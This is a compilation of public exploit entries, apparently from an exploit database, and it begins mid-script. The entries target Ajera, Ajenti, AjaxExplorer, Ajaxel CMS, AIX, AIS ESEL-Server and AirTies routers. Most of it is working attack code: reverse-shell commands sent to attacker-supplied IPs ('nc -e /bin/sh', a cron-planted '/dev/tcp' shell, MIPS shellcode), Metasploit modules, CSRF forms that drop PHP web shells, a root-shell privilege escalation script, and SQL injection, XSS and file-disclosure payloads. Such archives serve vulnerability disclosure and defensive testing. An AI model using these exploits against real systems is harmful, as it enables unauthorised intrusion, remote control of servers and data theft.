target = args.url
try:
login(args.email, args.password)
company_id = get_company() if not args.id else args.id
main()
except:
sys.exit(0)
# Exploit Title: Ajera Timesheets <= 9.10.16 - Deserialization of untrusted data
# Date: 2019-01-03
# Exploit Author: Anthony Cole
# Vendor Homepage: https://www.deltek.com/en/products/project-erp/ajera
# Version: <= 9.10.16
# Contact: http://twitter.com/acole76
# Website: http://twitter.com/acole76
# Tested on: Windows 2012
# CVE: CVE-2018-20221
# Category: webapps
#
# Ajera is a software written in .NET by Deltek. Version <= 9.10.16 allows an attacker to cause the software to deserialize untrusted data that can result in remote code execution.
# Secure/SAService.rem in Deltek Ajera Timesheets <= 9.10.16 are vulnerable to remote code execution via deserialization of untrusted user input from an authenticated user. The executed code will run as the IIS Application Pool that is running the application.
#
import struct, sys, requests, zlib, argparse, urlparse, subprocess
def run_command(command):
p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
output = b''
for line in iter(p.stdout.readline, b''):
output += line
return output
def isurl(urlstr):
try:
urlparse.urlparse(urlstr)
return urlstr
except:
raise argparse.ArgumentTypeError("invalid url")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Ajera .NET Remoting Exlpoit')
parser.add_argument("--url", "-u", type=isurl, required=True, help="the url of the target.")
parser.add_argument("--cmd", "-c", required=True, help="the command to execute")
parser.add_argument("--auth", "-a", required=True, help="the ASPXAUTH cookie")
parser.add_argument("--version", "-v", required=False, help="the version of Ajera Server. 8.9.9.0 => 8990", default="8990")
parser.add_argument("--ysoserial", "-y", required=True, help="the path to ysoserial.exe")
parser.add_argument("--proxy", "-p", type=isurl, required=False, help="ex: http://127.0.0.1:8080")
args = parser.parse_args()
url_parts = urlparse.urlparse(args.url)
target_url = "%s://%s" % (url_parts.scheme, url_parts.netloc)
proxies = {}
if(args.proxy != None):
proxy_parts = urlparse.urlparse(args.proxy)
proxies[proxy_parts.scheme] = "%s://%s" % (proxy_parts.scheme, proxy_parts.netloc)
cmd = "/c " + args.cmd
size = len(cmd)
serial_payload = run_command('%s -o raw -g TypeConfuseDelegate -f BinaryFormatter -c "%s"' % (args.ysoserial, args.cmd))
url = target_url + "/ajera/Secure/SAService.rem"
headers = {'Content-Type': 'application/octet-stream'}
cookies = {'.ASPXAUTH': args.auth}
payload = "\x04" + args.version + zlib.compress(serial_payload)
response = requests.post(url, headers=headers, cookies=cookies, data=payload, proxies=proxies, verify=False)
# Title: AjentiCP 1.2.23.13 - Cross-Site Scripting
# Author: Numan OZDEMIR (https://infinitumit.com.tr)
# Vendor Homepage: ajenti.org
# Software Link: https://github.com/ajenti/ajenti
# Version: Up to v1.2.23.13
# CVE: CVE-2018-18548
# Description:
# Attacker can inject JavaScript codes without Ajenti privileges by this
# vulnerabillity.
# Normally an attacker cant intervene to Ajenti without Ajenti privileges.
# But with this vulnerability, if attacker can create a folder (may be by
# a web app vulnerability) he can run
# bad-purposed JavaScript codes on Ajenti user's browser, while the user
# using File Manager tool.
# So this vulnerability makes high risk.
# How to Reproduce:
1)- Create a directory as named xss payload. Like, im<img src onerror=alert(1337)>dir
2)- Open this directory in File Manager tool in Ajenti server admin panel.
#!/usr/bin/python3
import requests
import sys
import warnings
from bs4 import BeautifulSoup
import json
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
if len(sys.argv) < 6:
print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort")
exit()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]
req = requests.session()
login_creds = {
"username":username,
"password":password,
"mode":"normal"}
print("[+] Sendin login request...")
login = req.post(url+"/api/core/auth", json = login_creds)
if username in login.text:
page = url + "/api/terminal/create"
payload = {
'command':'nc -e /bin/sh ' + ip + ' ' + port ,
'autoclose':True
}
payload = json.dumps(payload)
print("[+] Sending payload...")
send_payload = req.post(page, payload)
print("[+] Check your listener !...")
else:
print("[-] Wrong credentials or may the system patched.")
exit()
# Title: Ajenti 2.1.31 - Remote Code Execution
# Author: Jeremy Brown
# Date: 2019-10-13
# Software Link: https://github.com/ajenti/ajenti
# CVE: N/A
# Tested on: Ubuntu Linux
#!/usr/bin/python
# ajentix.py
#
# Ajenti Remote Command Execution Exploit
#
# -------
# Details
# -------
#
# Ajenti is a web control panel written in Python and AngularJS.
#
# One can locally monitor executed commands on the server while testing
#
# $ sudo ./exec-notify (google for "exec-notify.c", modify output as needed)
# sending proc connector: PROC_CN_MCAST_LISTEN... sent
# Reading process events from proc connector.
# Hit Ctrl-C to exit
#
# Browse over to https://server:8000/view/login/normal to login
#
# .....
# pid=9889 executed [/bin/sh -c /bin/su -c "/bin/echo SUCCESS" - test ]
# pid=9889 executed [/bin/su -c /bin/echo SUCCESS - test ]
#
# Modified the JSON request username value to be `id`
#
# pid=7514 executed [/bin/sh -c /bin/su -c "/bin/echo SUCCESS" - `id` ]
# pid=7516 executed [id ]
# pid=7514 executed [/bin/su -c /bin/echo SUCCESS - uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) ]
#
# *ACK.....*
#
# Also the login routine times out after 5 seconds (see auth.py), which
# makes an interactive shell relatively ephemeral. So, we cron job.
#
# $ python3 ajentix.py server.ip shell local-listener.ip
# Done!
#
# $ nc -v -l -p 5555
# Listening on [0.0.0.0] (family 0, port 5555)
# Connection from server.domain 41792 received!
# bash: cannot set terminal process group (18628): Inappropriate ioctl for device
# bash: no job control in this shell
# nobody@server:/var/spool/cron$ ps
# PID TTY TIME CMD
# 6386 ? 00:00:00 /usr/local/bin/ <-- ajenti-panel worker
# 18849 ? 00:00:00 sh
# 18851 ? 00:00:00 bash
# 18859 ? 00:00:00 ps
#
#
# Tested Ajenti 2.1.31 on Ubuntu 18.04, fixed in 2.1.32
#
# Fix commit: https://github.com/ajenti/ajenti/commit/7aa146b724e0e20cfee2c71ca78fafbf53a8767c
#
#
import os
import sys
import ssl
import json
import urllib.request as request
def main():
if(len(sys.argv) < 2):
print("Usage: %s <host> [\"cmd\" or shell...ip]\n" % sys.argv[0])
print("Eg: %s 1.2.3.4 \"id\"" % sys.argv[0])
print("... %s 1.2.3.4 shell 5.6.7.8\n" % sys.argv[0])
return
host = sys.argv[1]
cmd = sys.argv[2]
if(cmd == 'shell'):
if(len(sys.argv) < 4):
print("Error: need ip to connect back to for shell")
return
ip = sys.argv[3]
shell = "`echo \"* * * * * bash -i >& /dev/tcp/" + ip + "/5555 0>&1\" > /tmp/cronx; crontab /tmp/cronx`"
username = shell
else:
username = "`" + cmd + "`"
body = json.dumps({'username':username, 'password':'test', 'mode':'normal'})
byte = body.encode('utf-8')
url = "https://" + host + ":8000" + "/api/core/auth"
try:
req = request.Request(url)
req.add_header('Content-Type', 'application/json; charset=utf-8')
req.add_header('Content-Length', len(byte))
request.urlopen(req, byte, context=ssl._create_unverified_context()) # ignore the cert
except Exception as error:
print("Error: %s" % error)
return
print("Done!")
if(__name__ == '__main__'):
main()
# Exploit Title: Ajenti 2.1.31 - Remote Code Exection (Metasploit)
# Date: 2019-10-29
# Exploit Author: Onur ER
# Vendor Homepage: http://ajenti.org/
# Software Link: https://github.com/ajenti/ajenti
# Version: 2.1.31
# Tested on: Ubuntu 19.10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => "Ajenti 2.1.31 Remote Code Execution",
'Description' => %q{
This module exploits a command injection in Ajenti <= 2.1.31.
By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.
},
'Author' => [
'Jeremy Brown', # Vulnerability discovery
'Onur ER <onur@onurer.net>' # Metasploit module
],
'References' => [
['EDB', '47497']
],
'DisclosureDate' => '2019-10-14',
'License' => MSF_LICENSE,
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'Privileged' => false,
'Targets' => [
[ 'Ajenti <= 2.1.31', {} ]
],
'DefaultOptions' =>
{
'RPORT' => 8000,
'SSL' => 'True',
'payload' => 'python/meterpreter/reverse_tcp'
},
'DefaultTarget' => 0
))
register_options([
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => "/view/login/normal"
})
if res and res.code == 200
if res.body =~ /'ajentiVersion', '2.1.31'/
return Exploit::CheckCode::Vulnerable
elsif res.body =~ /Ajenti/
return Exploit::CheckCode::Detected
end
end
vprint_error("Unable to determine due to a HTTP connection timeout")
return Exploit::CheckCode::Unknown
end
def exploit
print_status("Exploiting...")
random_password = rand_text_alpha_lower(7)
json_body = { 'username' => "`python -c \"#{payload.encoded}\"`",
'password' => random_password,
'mode' => 'normal'
}
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'api', 'core', 'auth'),
'ctype' => 'application/json',
'data' => JSON.generate(json_body)
})
end
end
source: https://www.securityfocus.com/bid/53659/info
Ajaxmint Gallery is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit this vulnerability to view files and to execute local scripts in the context of the webserver process. This may aid in further attacks.
Ajaxmint Gallery 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/learn/ajaxmint/ajaxmint-gallery/admin/index.php?c=..\..\..\..\ajaxmint-gallery/pictures/5_me.jpg%00 [aka shell]
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AJAXEXPLORER-REMOTE-CMD-EXECUTION.txt
[+] ISR: apparitionsec
Vendor:
==========
sourceforge.net
smsid
download linx:
sourceforge.net/projects/ajax-explorer/files/
Product:
=======================
AjaxExplorer v1.10.3.2
Manage server files through simple windows like interface.
Vulnerability Type:
=======================
Remote Command Execution
CSRF
Persistent XSS
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
AjaxExplorer has command terminal feature where you can move, copy, delete
files etc... also lets a user save commands in a
flat file named "terminal" under their user profile
"/ae.user/owner/myprofile".
e.g.
copy [FILEPATH + FILENAME] [FILEPATH]
create [FILEPATH + FILENAME]
Since AjaxExplorer also suffers from CSRF vulnerability we can exploit the
application by first creating an .htaccess file with an
"allow from all" directive to bypass access restrictions, next create
arbitrary PHP files for remote command execution purposes.
This exploit will require two consecutive HTTP requests, so we need to
target an iframe to stay on same page until exploit is completed.
Exploit code(s):
===============
1) first POST request creates .htaccess file so we can bypass directory
browsing restrictions.
2) second POST writes our remote command execution file we will then access
to execute commands on the victim system.
The below P:/ for "strPath" form value is for "Profile"
<iframe name="PWNED" style="display:none" name="hidden-form"></iframe>
<form target="PWNED" id="htaccess" action="
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php"
method="post">
<input type="hidden" name="strPage" value="control/file/editor" >
<input type="hidden" name="strPath" value="P:/" >
<input type="hidden" name="strFile" value=".htaccess" >
<input type="hidden" name="strText" value='allow from all' >
<script>document.getElementById('htaccess').submit()</script>
</form>
<form target="PWNED" id="RCE" action="
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php"
method="post">
<input type="hidden" name="strPage" value="control/file/editor" >
<input type="hidden" name="strPath" value="P:/" >
<input type="hidden" name="strFile" value="terminal.php" >
<input type="hidden" name="strText" value='<?php exec($_GET["cmd"]);?>' >
<script>document.getElementById('RCE').submit()</script>
</form>
Now we can access and run arbitrary cmds.
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/ae.user/owner/myprofile/terminal.php?cmd=c
:\\Windows\\system32\\calc.exe
/////////////////////////////////////////////////////
Here is another way to RCE this application... first create PHP file then
edit.
<iframe name="DOOM" style="display:none" name="hidden-form"></iframe>
<form target="DOOM" id="CSRF2" method="post" action="
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php">
<input type="hidden" name="strPage" value="control/file/editor" />
<input type="hidden" name="strPath" value="D:/" />
<input type="hidden" name="strFile" value="PWNED.php" />
<input type="hidden" name="strText"
value="<?php%20exec($_GET['cmd']);%20?>" />
</form>
<form target="DOOM" id="CSRF1" method="post" action="
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php">
<input type="hidden" name="strPage" value="control/file/create" />
<input type="hidden" name="strPath" value="D:/" />
<input type="hidden" name="strFile" value="D:/PWNED.php" />
<script>
document.getElementById('CSRF1').submit()
document.getElementById('CSRF2').submit()
</script>
</form>
////////////////////////
Persistent XSS:
================
We can also write persistent XSS payload to the user profile "terminal"
file.
<form id="XSS" method="post" action="
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php">
<input type="hidden" name="strPage" value="control/file/editor" />
<input type="hidden" name="strPath" value="P:/" />
<input type="hidden" name="strFile" value="terminal" />
<input type="hidden" name="strText" value="<script>alert(666)</script>" />
<script>document.getElementById('XSS').submit()</script>
</form>
Disclosure Timeline:
===============================
Vendor Notification: NA
June 1, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
8.0 (High)
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
Ajaxel CMS 8.0 Multiple Vulnerabilities
Vendor: Ajaxel
Product web page: http://www.ajaxel.com
Affected version: 8.0 and below
Summary: Ajaxel CMS is very simple ajaxified CMS and framework
for any project needs.
Desc: Ajaxel CMS version 8.0 and below suffers from multiple
vulnerabilities inlcuding LFI, XSS, SQL injection and remote
code execution via CSRF.
Tested on: Apache 2.4.10
MySQL 5.5.46
Vendor status:
[13.04.2016] Vulnerabilities discovered.
[14.04.2016] Vendor contacted.
[18.04.2016] Vendor releases patch for version 8.0 to address these issues.
[05.05.2016] Public security advisory released.
Vulnerability discovered by Krzysztof 'DizzyDuck' Kosinski
[dizzyduck_at_zeroscience.mk]
1. Reflected XSS:
-----------------
GET /cmsj9bwp'-alert(1)-'xvjry=mods/ HTTP/1.1
Host: 192.168.10.5
HTTP/1.0 404 Not Found
...
...var Conf={LANG:'en', TPL:'default', DEVICE:'pc', SESSION_LIFETIME:7200,
USER_ID:1, URL_EXT:'', HTTP_EXT:'/', FTP_EXT:'/',
REFERER:'/cmsj9bwp'-alert(1)-'xvjry=mods', VERSION:8.0,
URL_KEY_ADMIN:'cms',...
2. SQL Injection:
-----------------
http://192.168.10.5/cms=mods/tab=ai?mods_ai_tab_ai-submitted=1&f=<SQLi>
3. Local File Disclosure:
-------------------------
http://192.168.10.5/?window&cms=templates&popup=1&file_folder=cms&folder=&file=../../../../../../../../../../../../etc/passwd
4. Cross-Site Request Forgery - RCE PoC:
----------------------------------------
<html>
<body>
<form action="http://192.168.10.5/cms=settings_eval_tab/tab=eval/load"
method="POST">
<input type="hidden" name="data[eval]"
value="phpinfo();" />
<input type="hidden" name="a" value="eval" />
<input type="hidden"
name="settings_eval_tab_eval-submitted" value="1" />
<input type="submit" value="Execute" />
</form>
</body>
</html>
# Exploit Title: Ajax Full Featured Calendar 2.0 - 'search' SQL Injection
# Dork: N/A
# Date: 25.05.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/ajax-full-featured-calendar-2/10158465
# Version: 2.0
# Category: Webapps
# Tested on: Kali linux
# Description : The vulnerability allows an attacker to inject sql commands from the search section with 'search' parameter.
====================================================
# Demo : http://pauloreg.com/d/affc2/index.php
# PoC : SQLi :
POST /d/affc2/includes/loader.php HTTP/1.1
Host: test.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://test.com/d/affc2/index.php
Content-Length: 11
Cookie: PHPSESSID=pt848bokjvads6c9kvgs1nu973
Connection: keep-alive
search=test
Parameter: search (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: search=test%' AND SLEEP(5) AND '%'='
====================================================
source: https://www.securityfocus.com/bid/47953/info
Ajax Chat is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Ajax Chat 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/ajax-chat/ajax-chat.php?chat_path=%27%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
source: https://www.securityfocus.com/bid/48702/info
AJ Classifieds is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/demo/ajclassifieds/classifiedsauto/index.php?do=detaillisting&listingid=77â??a
#!/bin/sh
#
# Exploit Title: AIX 7.1 lquerylv privilege escalation
# Date: 2015.10.30
# Exploit Author: S2 Crew [Hungary]
# Vendor Homepage: www.ibm.com
# Software Link: -
# Version: -
# Tested on: AIX 7.1 (7100-02-03-1334)
# CVE : CVE-2014-8904
#
# From file writing to command execution ;)
#
export _DBGCMD_LQUERYLV=1
umask 0
ln -s /etc/suid_profile /tmp/DEBUGCMD
/usr/sbin/lquerylv
cat << EOF >/etc/suid_profile
cp /bin/ksh /tmp/r00tshell
/usr/bin/syscall setreuid 0 0
chown root:system /tmp/r00tshell
chmod 6755 /tmp/r00tshell
EOF
/opt/IBMinvscout/bin/invscoutClient_VPD_Survey # suid_profile because uid!=euid
/tmp/r00tshell
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::MSSQL_COMMANDS
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'AIS logistics ESEL-Server Unauth SQL Injection RCE',
'Description' => %q{
This module will execute an arbitrary payload on an "ESEL" server used by the
AIS logistic software. The server typically listens on port 5099 without TLS.
There could also be server listening on 5100 with TLS but the port 5099 is
usually always open.
The login process is vulnerable to an SQL Injection. Usually a MSSQL Server
with the 'sa' user is in place.
This module was verified on version 67 but it should also run on lower versions.
An fixed version was created by AIS in September 2017. However most systems
have not been updated.
In regard to the payload, unless there is a closed port in the web server,
you dont want to use any "bind" payload. You want a "reverse" payload,
probably to your port 80 or to any other outbound port allowed on the firewall.
Currently, one delivery method is supported
This method takes advantage of the Command Stager subsystem. This allows using
various techniques, such as using a TFTP server, to send the executable. By default
the Command Stager uses 'wcsript.exe' to generate the executable on the target.
NOTE: This module will leave a payload executable on the target system when the
attack is finished.
},
'Author' =>
[
'Manuel Feifel'
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-10123'],
],
'Platform' => 'win',
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Payload' =>
{
'BadChars' => "\x00\xff\x27",
},
'Targets' =>
[
[ 'Automatic', { } ],
],
'CmdStagerFlavor' => 'vbs',
'DefaultTarget' => 0,
'DisclosureDate' => '2019-03-27',
'DefaultOptions' =>
{
'RPORT' => 5099
},
))
end
# This is method required for the CmdStager to work...
def execute_command(cmd, _opts)
cmd_xp = "EXEC master..xp_cmdshell '#{cmd}'"
send_login_msg(create_login_msg_sql(cmd_xp))
end
# prepends the required length to the message and sends it to the server
def send_login_msg(login_msg, check_response = true)
length = login_msg.length
length += length.to_s.length
login_msg = "#{length}#{login_msg}"
connect
sock.put(login_msg)
response = sock.recv(10000)
if check_response
if (response.include? 'Zugangsdaten Falsch') && (response.length > (length - 20))
print_good('Correct response received => Data send successfully')
else
print_warning('Wrong response received => Probably data could not be sent successfully')
end
end
return response
ensure
# Every time a new Connection is required
disconnect
end
# embeds a sql command into the login message
def create_login_msg_sql(sql_cmd)
return create_login_msg("#{rand(1_000..9_999)}'; #{sql_cmd}--")
end
# create a plain login message
def create_login_msg(pw)
delim = "\xFF"
login_str = "#{delim}000000#{delim}20180810213226#{delim}01#{delim}60"\
"#{delim}02#{delim}1111#{delim}#{pw}#{delim}AAAAA#{delim}120"
end
def check
int = rand(1..1_000)
response_bypass = send_login_msg(create_login_msg("#{rand(1_000..9_999)}' OR #{int}=#{int}--"), false)
if response_bypass.include? 'Zugangsdaten OK'
CheckCode::Vulnerable
else
print_status("Response was: #{response_bypass}")
CheckCode::Safe
end
end
def exploit
# enable xp cmdshell, used to execute commands later
# Software uses the 'sa' user by default
send_login_msg(create_login_msg_sql(mssql_xpcmdshell_enable))
# The porotocol has no limites on max-data
execute_cmdstager({ :linemax => 1500 })
print_warning('The payload is left on the client in the \%TEMP\% Folder of the corresponding user.')
print_status('Stager should now be executed.')
end
end
#!/usr/bin/env python
#####################################################################################
# Exploit for the AIRTIES Air5650v3TT
# Spawns a reverse root shell
# Author: Batuhan Burakcin
# Contact: batuhan@bmicrosystems.com
# Twitter: @batuhanburakcin
# Web: http://www.bmicrosystems.com
#####################################################################################
import sys
import time
import string
import socket, struct
import urllib, urllib2, httplib
if __name__ == '__main__':
try:
ip = sys.argv[1]
revhost = sys.argv[2]
revport = sys.argv[3]
except:
print "Usage: %s <target ip> <reverse shell ip> <reverse shell port>" % sys.argv[0]
host = struct.unpack('>L',socket.inet_aton(revhost))[0]
port = string.atoi(revport)
shellcode = ""
shellcode += "\x24\x0f\xff\xfa\x01\xe0\x78\x27\x21\xe4\xff\xfd\x21\xe5\xff\xfd"
shellcode += "\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\xaf\xa2\xff\xff"
shellcode += "\x8f\xa4\xff\xff\x34\x0f\xff\xfd\x01\xe0\x78\x27\xaf\xaf\xff\xe0"
shellcode += "\x3c\x0e" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1]
shellcode += "\x35\xce" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1]
shellcode += "\xaf\xae\xff\xe4"
shellcode += "\x3c\x0e" + struct.unpack('>cccc',struct.pack('>I', host))[0] + struct.unpack('>cccc',struct.pack('>I', host))[1]
shellcode += "\x35\xce" + struct.unpack('>cccc',struct.pack('>I', host))[2] + struct.unpack('>cccc',struct.pack('>I', host))[3]
shellcode += "\xaf\xae\xff\xe6\x27\xa5\xff\xe2\x24\x0c\xff\xef\x01\x80\x30\x27"
shellcode += "\x24\x02\x10\x4a\x01\x01\x01\x0c\x24\x11\xff\xfd\x02\x20\x88\x27"
shellcode += "\x8f\xa4\xff\xff\x02\x20\x28\x21\x24\x02\x0f\xdf\x01\x01\x01\x0c"
shellcode += "\x24\x10\xff\xff\x22\x31\xff\xff\x16\x30\xff\xfa\x28\x06\xff\xff"
shellcode += "\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f"
shellcode += "\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec"
shellcode += "\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab"
shellcode += "\x01\x01\x01\x0c"
data = "\x41"*359 + "\x2A\xB1\x19\x18" + "\x41"*40 + "\x2A\xB1\x44\x40"
data += "\x41"*12 + "\x2A\xB0\xFC\xD4" + "\x41"*16 + "\x2A\xB0\x7A\x2C"
data += "\x41"*28 + "\x2A\xB0\x30\xDC" + "\x41"*240 + shellcode + "\x27\xE0\xFF\xFF"*48
pdata = {
'redirect' : data,
'self' : '1',
'user' : 'tanri',
'password' : 'ihtiyacmyok',
'gonder' : 'TAMAM'
}
login_data = urllib.urlencode(pdata)
#print login_data
url = 'http://%s/cgi-bin/login' % ip
header = {}
req = urllib2.Request(url, login_data, header)
rsp = urllib2.urlopen(req)
# Exploit Title: Airties AIR5444TT - Cross-Site Scripting
# Date: 2018-07-06
# Exploit Author: Raif Berkay Dincel
# Vendor Homepage: airties.com
# Software [http://www.airties.com.tr/support/dcenter/]
# Version: [1.0.0.18]
# CVE-ID: CVE-2018-8738
# Tested on: MacOS High Sierra / Linux Mint / Windows 10
# Vulnerable Parameter Type: GET
# Vulnerable Parameter: 192.168.2.1/top.html?page=main&productboardtype=
# Proof of Concepts:
192.168.2.1/top.html?page=main&productboardtype=<script>alert("Raif Berkay Dincel");</script>
http://192.168.2.1/top.html?page=main&productboardtype=%3Cscript%3Ealert(%22Raif%20Berkay%20Dincel%22);%3C/script%3E
# Exploit Title: Airties AIR5342 1.0.0.18 - Cross-Site Scripting
# Date: 25-09-2018
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: [https://www.airties.com/]
# Software [http://www.airties.com.tr/support/dcenter/]
# Version: [1.0.0.18]
# Affected products: AIR5342, AIR5343v2, AIR5443v2, AIR5453, AIR5442, AIR5750, AIR5650, AIR5021
# Tested on: MacOS High Sierra / Linux Mint / Windows 10
# CVE : CVE-2018-17593, CVE-2018-17590, CVE-2018-17591, CVE-2018-17588, CVE-2018-17587
# A cross site scripting vulnerability has been discovered in the AIR5342 modem of the AirTies manufacturer.
# AirTies Air 5342 devices have XSS via the top.html productboardtype parameter.
# HTTP Requests :
GET /top.html?page=main&productboardtype=%3Cscript%3Ealert(%22Ismail%20Tasdelen%22);%3C/script%3E HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1